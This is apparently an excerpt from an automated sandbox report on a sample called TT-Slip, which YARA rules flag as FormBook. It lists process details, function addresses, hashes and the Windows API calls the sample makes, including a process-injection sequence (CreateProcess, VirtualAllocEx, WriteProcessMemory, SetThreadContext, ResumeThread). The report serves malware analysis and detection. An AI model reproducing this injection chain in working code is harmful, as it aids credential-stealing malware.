Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	09:01:58
Start date:	30/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff79f9e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	214
Total number of Limit Nodes:	12

Executed Functions

Function 06B30006 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4171df7b043637e1e01c684710956b44f8d61786d67bfe03dfe992ca0252c4
Instruction ID: 84575ea900c3d8ee55a0fd36cb5e4c8d1556ae8fc65279967a430c19d2abcee5
Opcode Fuzzy Hash: 1c4171df7b043637e1e01c684710956b44f8d61786d67bfe03dfe992ca0252c4
Instruction Fuzzy Hash: 4D316471D097948FDB4ACF66C8142DEBFB6EFCA300F09C0AAC449AB266D7380905CB51

Function 06B39405 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa051518dc4f66fd0348ee71b0b3608d2a15e3a771a6854be49f399e56ea8e0c
Instruction ID: d49c858fabe745b3e13a8d9985891c4c65ebfadad5911d1edf3aac956e7746a5
Opcode Fuzzy Hash: aa051518dc4f66fd0348ee71b0b3608d2a15e3a771a6854be49f399e56ea8e0c
Instruction Fuzzy Hash: B0A002F5F8E47099B2C02CB415110F6F17E428B280F0079C1921B730167490C458018D

Function 00B0CF70 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B0CFFE
GetCurrentThread.KERNEL32 ref: 00B0D03B
GetCurrentProcess.KERNEL32 ref: 00B0D078
GetCurrentThreadId.KERNEL32 ref: 00B0D0D1

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0a84a0ba8d5e3f4fd6d8482fb95595569cb42e972d5b5b08d47a085dd9dcec70
Instruction ID: 7a87586e1f5bc773a1e3daba7d192e810ef21635edaf34bc98fd6c9b50ab0c0e
Opcode Fuzzy Hash: 0a84a0ba8d5e3f4fd6d8482fb95595569cb42e972d5b5b08d47a085dd9dcec70
Instruction Fuzzy Hash: 435145B0D003499FEB14CFA9D548BDEBFF1EF88304F248499E409A72A1D7745989CB66

Function 00B0CF80 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B0CFFE
GetCurrentThread.KERNEL32 ref: 00B0D03B
GetCurrentProcess.KERNEL32 ref: 00B0D078
GetCurrentThreadId.KERNEL32 ref: 00B0D0D1

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 55c5dd19dfbf935a8fecf3a84718edf72814479a6e1f4be0328791d87fdbc595
Instruction ID: ac1619222fcc0c0db8946331cceca498a3ff865cd93c7d10770d6b64a9c6cd10
Opcode Fuzzy Hash: 55c5dd19dfbf935a8fecf3a84718edf72814479a6e1f4be0328791d87fdbc595
Instruction Fuzzy Hash: 765134B0D003099FDB14CFA9D548BDEBFF1EF88304F208499E419A7290D7745989CB66

Function 06B35C58 Relevance: 1.8, APIs: 1, Instructions: 255
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B35EA6

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1de83480c40b5a16479a23fb8994ee2abbd04da40e24314c35b7b53dcf9cd406
Instruction ID: 9d1d9d218e14d6743d61b52f9c9b30bbfdae9575db7592c3976eea9ff5835cdb
Opcode Fuzzy Hash: 1de83480c40b5a16479a23fb8994ee2abbd04da40e24314c35b7b53dcf9cd406
Instruction Fuzzy Hash: 9EA160B1E007299FDB60CF68C845BDDBBB2FF44314F1485A9E849A7280DB749985CF91

Function 06B35C70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06B35EA6

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a4aae00b65daedda2077496d04c4c78efc698a97d251d2a5eda2dcbce37c5901
Instruction ID: 0468f5c427884d4032d662fe748a5d749941aa4a09b8ef5d209df930f5cc73cd
Opcode Fuzzy Hash: a4aae00b65daedda2077496d04c4c78efc698a97d251d2a5eda2dcbce37c5901
Instruction Fuzzy Hash: 8F9150B1E006298FDB60CF68C845BDDBBB2FF44314F1485A9D809A7280DB749985CF91

Function 00B0ACE8 Relevance: 1.7, APIs: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AF3E

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e5ce52702bfaca5b02facf989c412d4227ea2c10755d22b31dc5fb3d9c71a47a
Instruction ID: 958bbde1f5b7eb37747a3992af681bbaef82d4cc94e735d5e70967e22ba97c28
Opcode Fuzzy Hash: e5ce52702bfaca5b02facf989c412d4227ea2c10755d22b31dc5fb3d9c71a47a
Instruction Fuzzy Hash: 05816970A00B058FD724DF69D45179ABBF1FF88304F108A6ED48ADBA90D735E94ACB91

Function 00B058EC Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B059A9

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fa8af7ec83219b74760886d2bdb4eda183452a156d5c742da677863f707c1303
Instruction ID: c163112ba9601bc0389a062a5ea224573615b4d4e2e03d9b65950ce8568f06c1
Opcode Fuzzy Hash: fa8af7ec83219b74760886d2bdb4eda183452a156d5c742da677863f707c1303
Instruction Fuzzy Hash: 5B41E2B0D00619CFDB24DFA9C884BDEBBF5BF48304F20819AD409AB251DB75694ACF91

Function 00B044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B059A9

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 701b10855fb245dde53cad9abb7ba4923e7f10872fd3c2bb245dcfdba6387478
Instruction ID: ef134fd36aa5836b02278fe4f2598a0804b4660de7443f2b205e5ceab326eb08
Opcode Fuzzy Hash: 701b10855fb245dde53cad9abb7ba4923e7f10872fd3c2bb245dcfdba6387478
Instruction Fuzzy Hash: 0E41AFB0D00619CADB24DFA9C888ADEBBF5BF49304F2081AAD409AB251DB756945CF91

Function 06B355E1 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B35678

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 489cadf6f6473a2f21f296557216343e1bb09f188f222be7d64bf2324fd39295
Instruction ID: a439d02a1a59483e4f7a95b6ee202585f529df9d2af0e24f06b7ed4e3f461fc1
Opcode Fuzzy Hash: 489cadf6f6473a2f21f296557216343e1bb09f188f222be7d64bf2324fd39295
Instruction Fuzzy Hash: 9F2126B6D003199FDB10CFA9C885BDEBBF5FF48310F10842AE919A7240D778A945DBA5

Function 06B355E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06B35678

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: dfbc95d6319db56cb08a0750fd4b6b58739c9b2a707e0494d4719a9a84b040d0
Instruction ID: 1eb6783ae6e19e7ff38e08732333f39dd17b1adfe3e63c93d7ebfc8fb2f92474
Opcode Fuzzy Hash: dfbc95d6319db56cb08a0750fd4b6b58739c9b2a707e0494d4719a9a84b040d0
Instruction Fuzzy Hash: 642139B6D003199FCB10CFA9C885BDEBBF5FF48310F10842AE919A7240D778A945CBA1

Function 06B356D0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B35758

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 539979efb6e70e96f429f3030d0be8ad9601bc09c71984adbd732c2d27f49353
Instruction ID: 8b150587f43b5ae600b21a11aba242eb9b1378dbc8352df5b3f233f396884079
Opcode Fuzzy Hash: 539979efb6e70e96f429f3030d0be8ad9601bc09c71984adbd732c2d27f49353
Instruction Fuzzy Hash: E12116B1D002599FCB10DFAAC885AEEFBF5FF48310F14842AE919A7240C7799541DBA1

Function 06B35010 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B35096

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 30ff8af552b16f0e76d1ed8ad9be5ee21b63c72d97e9fad9e6dc34d8842b2e77
Instruction ID: 8da5fb86c1aae071b1793194264afa222de98b7fec8c68cdfeeb21fcd631ef04
Opcode Fuzzy Hash: 30ff8af552b16f0e76d1ed8ad9be5ee21b63c72d97e9fad9e6dc34d8842b2e77
Instruction Fuzzy Hash: 222159B2D002098FDB20DFAAC4857EEBBF4EF88314F14842AD419A7240C7799945CFA1

Function 00B0D5C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D657

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f7d1027b0454c56b30cbbf2c3965758d43a4e3449aa9ec049a0432bab06952d1
Instruction ID: 8f5247e80325837e322db3d884d1691826cfcd84945652ed688872cfb6a33108
Opcode Fuzzy Hash: f7d1027b0454c56b30cbbf2c3965758d43a4e3449aa9ec049a0432bab06952d1
Instruction Fuzzy Hash: EA21E3B5D00249AFDB10CFAAD984AEEBFF5EB48310F14845AE918A3350C379A945CF61

Function 00B0AF70 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AF3E

Part of subcall function 00B0A070: LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0AFB9,00000800,00000000,00000000), ref: 00B0B1CA

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 8a80db18ce8d6e5e973152d25479af9fbdb68c72f20c48a65e2a41ac5dffc0ba
Instruction ID: 62d1fe0205ac9c4485aba787c092d2033628245616454a0aa8eef08a4fffd546
Opcode Fuzzy Hash: 8a80db18ce8d6e5e973152d25479af9fbdb68c72f20c48a65e2a41ac5dffc0ba
Instruction Fuzzy Hash: 4A1108B29043058FD710DB66D8107EBBFF5EBC4314F1588AAE505E7291C7749C06CBA2

Function 06B356D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06B35758

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2a0d9246a0712bcb729f8f6e23a56e1db826557e959aa992a220a30819fcadce
Instruction ID: 8e9c2dadd9d8c8ffdd8ebe7784a0cb9e3567158ca8bc8c1f17cc8aaf775f482c
Opcode Fuzzy Hash: 2a0d9246a0712bcb729f8f6e23a56e1db826557e959aa992a220a30819fcadce
Instruction Fuzzy Hash: 982128B1D003599FCB10DFAAC885ADEFBF5FF48310F14842AE919A7240C7749541DBA1

Function 06B35018 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06B35096

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 318701a94142e03127e092e4771a3c033ad11a07689ec1b4023739285c4d6188
Instruction ID: e67935eed86cb4f213ac8adab1cf499113ede77b0bf30f99fd3cfb7160237493
Opcode Fuzzy Hash: 318701a94142e03127e092e4771a3c033ad11a07689ec1b4023739285c4d6188
Instruction Fuzzy Hash: C92118B2D003098FDB20DFAAC485BEEBBF4EF88314F14842AD419A7241C7799945CFA5

Function 00B0D5D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B0D657

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 95a23c9f043a8009f176ece0db50e7a22aebe877c12cc2ca8dd8400d7661ba51
Instruction ID: 2f51cc6827fdaf1302b9ecf56a2516187223ebd82f156ac9fe1314e455a82236
Opcode Fuzzy Hash: 95a23c9f043a8009f176ece0db50e7a22aebe877c12cc2ca8dd8400d7661ba51
Instruction Fuzzy Hash: 8521E2B5D002099FDB10CFAAD984ADEFFF8EB48310F14845AE918A3350C375A944CFA5

Function 00B0A070 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0AFB9,00000800,00000000,00000000), ref: 00B0B1CA

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f8681069f91d3bd30c54a24275c67a5f017f2fe5c5d08218519ee93e03f38d21
Instruction ID: 0a36a5c34c92f464652133812b2f68fbf6a16d732abf7d6edfcedba3e9fd62ae
Opcode Fuzzy Hash: f8681069f91d3bd30c54a24275c67a5f017f2fe5c5d08218519ee93e03f38d21
Instruction Fuzzy Hash: 661100B6D102098FDB10CF9AC848A9EFBF4EB88310F14846AE419B7240C3B5A945CFA5

Function 00B0B158 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B0AFB9,00000800,00000000,00000000), ref: 00B0B1CA

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 59ba02672004365199a5fa9a07d53565076f344d6f54b8f531cc0702174fbe24
Instruction ID: 72babef2cedc7ffc79b35a9dc922714e6ffe021296b9b7c3b0488791cade8b5a
Opcode Fuzzy Hash: 59ba02672004365199a5fa9a07d53565076f344d6f54b8f531cc0702174fbe24
Instruction Fuzzy Hash: 3A1103B6C102498FDB10CFAAD844ADEFBF4EB89310F14845AD519A7240C375A945CFA5

Function 06B35521 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B35596

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 41e992630ef2724445f8363edb714bcdb638c9eb8ddd38326b36d74a0830b5f7
Instruction ID: d4a59e5037b8ecbc7f2fa67e0a59772c40464f8418890618dd5693b2bbb5b433
Opcode Fuzzy Hash: 41e992630ef2724445f8363edb714bcdb638c9eb8ddd38326b36d74a0830b5f7
Instruction Fuzzy Hash: 961156B6D002499FCB20DFA9C844BDEFFF5EB88320F24881AE519A7250C775A541CFA1

Function 06B35528 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B35596

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3ff901e9024e8894acb339d8b7bfda796c09eeb1722b8bd95150adcc284a2220
Instruction ID: de7cb20caabd7ee4b1cdcbeecd072d79b3b1e4629041e0351628af6c02f9c4c4
Opcode Fuzzy Hash: 3ff901e9024e8894acb339d8b7bfda796c09eeb1722b8bd95150adcc284a2220
Instruction Fuzzy Hash: 6B112972D002499FCB20DFA9C845BDEBFF5EB88310F248419E519A7250C775A540CFA1

Function 06B34F61 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06B34FCA

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: d6a96125401c36f0646da15ac369705911848f95e6a38f82137f91bcf585f1e8
Instruction ID: 65337c16942532484471d346a4fd753d597b4e2b6421d54b7d972915db3710c8
Opcode Fuzzy Hash: d6a96125401c36f0646da15ac369705911848f95e6a38f82137f91bcf585f1e8
Instruction Fuzzy Hash: CD1146B5D002498FCB20DFAAD845B9EFBF4EB88324F24841AD419A7240CB74A940CBA5

Function 06B3A000 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06B3A065

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6f635aa70171e77443d1594bc755819b54bbded632af5407ff0599fa74b2e58a
Instruction ID: 69ef0547ab2acabc1e9374121f646e4dfd4257fa21756828ae5427617332a5b0
Opcode Fuzzy Hash: 6f635aa70171e77443d1594bc755819b54bbded632af5407ff0599fa74b2e58a
Instruction Fuzzy Hash: E91122B58003599FDB20CF9AD889BDEFFF8EB48320F24844AE458A7241C375A544CFA1

Function 06B34F68 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06B34FCA

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 60ebfb6c118344c990b369311278c91891d364388daadf00b7e56a57daeb1263
Instruction ID: 1f7ac56413cee5ce39521d9343e86cf1b64902a66ac45e5a19a3c9729e00b457
Opcode Fuzzy Hash: 60ebfb6c118344c990b369311278c91891d364388daadf00b7e56a57daeb1263
Instruction Fuzzy Hash: CC1128B1D002498FDB20DFAAC845B9EFBF4EB88324F248419D419A7240C7756945CBA5

Function 00B0AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B0AF3E

Memory Dump Source

Source File: 00000000.00000002.2097631966.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b00000_TT-Slip.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7d5871c769c5928668a7a70dd602c7087213df0f1309263e68ec984878931278
Instruction ID: 7ce69b49903f6de03b3b4b0adede73a8ea42195cc4ca681c5396bf9648f4d546
Opcode Fuzzy Hash: 7d5871c769c5928668a7a70dd602c7087213df0f1309263e68ec984878931278
Instruction Fuzzy Hash: 9711E0B6C0034A8FDB10CF9AD444ADEFBF8EB88314F15845AD519A7250C379A545CFA1

Function 06B3596C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06B3A065

Memory Dump Source

Source File: 00000000.00000002.2102906437.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_TT-Slip.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3361f3fa35fdcab2759e1b1a6e072773ae6a1485cfcc4ddeed38affdc436c4a7
Instruction ID: c5a01c69f98123f9d181b9a02323c7dfbe70297ac5a425be84327ef3ce8d544c
Opcode Fuzzy Hash: 3361f3fa35fdcab2759e1b1a6e072773ae6a1485cfcc4ddeed38affdc436c4a7
Instruction Fuzzy Hash: 0411F5B59003499FDB20DF99C885BDEBBF8EB48310F208459E555A7200C375A944CFA1

Function 0085D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094230840.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d455a8bbf3fc3fad9ee4a600dea8798d2105c9e47fbca4071d77897ae4716015
Instruction ID: d01c1654bdf6f7f4078f3257d0fb60891add1024935f1c99f5bbbfbbaac85593
Opcode Fuzzy Hash: d455a8bbf3fc3fad9ee4a600dea8798d2105c9e47fbca4071d77897ae4716015
Instruction Fuzzy Hash: C12148B1500304DFDB14DF04D9C0B26BF65FB94315F34C569DC098B246C33AE85AC6A6

Function 0086D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094411532.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46a156498bdd8dcf6a4f3f2ec69bc87bd4927f4d180d706371a9aa831093b9fe
Instruction ID: ca2a277f0033fa645c244d92c1e22371c7931076edce3d95b34b2207af0ba57a
Opcode Fuzzy Hash: 46a156498bdd8dcf6a4f3f2ec69bc87bd4927f4d180d706371a9aa831093b9fe
Instruction Fuzzy Hash: EE21F5B1A04344EFDB05DF14D5D0B25BBA5FB84318F24C56DD9098B351C336E846CA61

Function 0086D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094411532.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_86d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40be8464495c9893dc1c2eb6d4d35f5c1da8f9c475e143093cc21208bf35215e
Instruction ID: 9a3c4a88d746cb5c72090b2000c494cae089b30a455f2698e6271393ad967809
Opcode Fuzzy Hash: 40be8464495c9893dc1c2eb6d4d35f5c1da8f9c475e143093cc21208bf35215e
Instruction Fuzzy Hash: 3A21D375A04744DFDB14DF14D584B26BB65FB84318F34C569D80A8B246C33AD807CA62

Function 0085D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2094230840.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_85d000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
Instruction ID: 3ab62c551fa8649febb89b9ea5d732d7668b6c4c4ac4a3941fc94c0a894c93fb
Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
